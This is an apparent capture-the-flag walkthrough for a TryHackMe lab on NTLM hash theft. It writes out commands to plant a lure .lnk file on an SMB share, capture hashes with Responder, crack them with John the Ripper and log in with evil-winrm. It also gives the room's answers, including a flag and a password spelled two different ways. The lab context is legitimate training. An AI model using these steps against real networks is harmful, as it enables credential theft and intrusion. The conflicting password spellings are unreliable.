2. What is the name of the AD authentication protocol that makes use of the NTLM hash?
NetNTLM
3. What is the name of the tool that can intercept these authentication challenges?
Responder
4. What is the password that McGreedy set for the Administrator account?
For this you have to go to the following directory:
cd /root/Rooms/AoC2023/Day23/ntlm_theft/
and then
cd stealthy
After this write the command to connect with the smbclient.
smbclient //10.10.69.51/ElfShare/ -U guest%
//10.10.69.51/ElfShare/
: This is the SMB share path you are connecting to.
-U guest%
: This is specifying the username as "guest" and an empty password ("%").
put stealthy.lnk
dir
Now on the other terminal run the Responder cmd
responder -I ens5
It took several minutes to connect. In the mean time download the file of mcgreedy.txt
And in the another tab you will see some responses. Copy the hash in hash.txt and do the following:
john --wordlist=greedykeys.txt hash.txt
And this will give us the password which is GreedyGrabber1@.
GreedyGrabbber1@
5. What is the value of the flag that is placed on the Administrator’s desktop?
For this we will use evil-winrm to connect the Windows. And go to the Desktop directory.
Here, we will write ls or dir to know the content of the directory and get the flag.txt file
THM{Greedy.Greedy.McNot.So.Great.Stealy}
Thanks for reading!!